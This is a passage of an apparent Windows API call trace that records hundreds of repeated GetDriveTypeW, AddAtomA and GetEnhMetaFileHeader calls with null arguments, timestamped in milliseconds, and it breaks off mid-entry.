[0093.549] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.549] AddAtomA (lpString=0x0) returned 0x0 [0093.549] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.549] AddAtomA (lpString=0x0) returned 0x0 [0093.549] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.549] AddAtomA (lpString=0x0) returned 0x0 [0093.549] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.549] AddAtomA (lpString=0x0) returned 0x0 [0093.549] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.550] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] 